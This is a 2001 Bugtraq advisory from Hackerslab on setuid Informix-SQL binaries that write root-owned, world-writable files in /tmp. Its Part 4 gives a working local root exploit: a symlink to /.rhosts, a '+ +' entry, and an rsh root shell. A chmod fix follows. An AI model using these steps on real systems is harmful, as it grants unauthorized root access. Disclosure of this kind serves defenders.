De: <s96192@ce.hannam.ac.kr>
À: <bugtraq@securityfocus.com>
Objet: [ Hackerslab bug_paper ] Informix-SQL application vulnerability
Date : mardi 4 septembre 2001 18:40

==============================================================================

       [ Hackerslab bug_paper ] Informix-SQL application vulnerability

==============================================================================

File   : Informix-SQL application

SYSTEM : Systems running Informix

INFO :

There is a vulneribility in informix-SQL application which allows local
users to create any file with root privilege:

PART 1 :
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5   
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x   1 root     informix 2234104 Nov 18  1999 onbar_d
-rwsr-sr-x   1 root     informix 2219456 Nov 18  1999 ondblog
-rwsr-sr-x   1 root     informix 2284972 Apr 10  2000 onsmsync
-rwsr-sr-x   1 root     informix   39144 Nov 18  1999 onsrvapd

$ ./onbar_d   or ./ondblog  or ./onsmsync
$ ls -al /tmp/bar*
-rw-rw----   1 root     informix     557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw----   1 root     informix       0 Aug 29 17:26 /tmp/bar_dbug.log


PART 2:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw-   1 root     informix     141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw-   1 informix informix     319 Aug 29 17:38 /tmp/onsrvapd.log

PART 3:

$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx   1 root     root        1085 Aug 29 17:43 /tmp/snmpd.log


PART 4:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw-   1 root     informix     141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root


SOLUTION :

remove setuid permition, contact your vendor and get a patch.
$ su -
# cd ~informix/bin  (Informix HOME Directory)
# chmod o-s onbar_d  ondblog  onsmsync  onsrvapd


==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *                                               Kim Yong-Jun
 *      **   **      *                                     loveyou@hackerslab.org
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==

 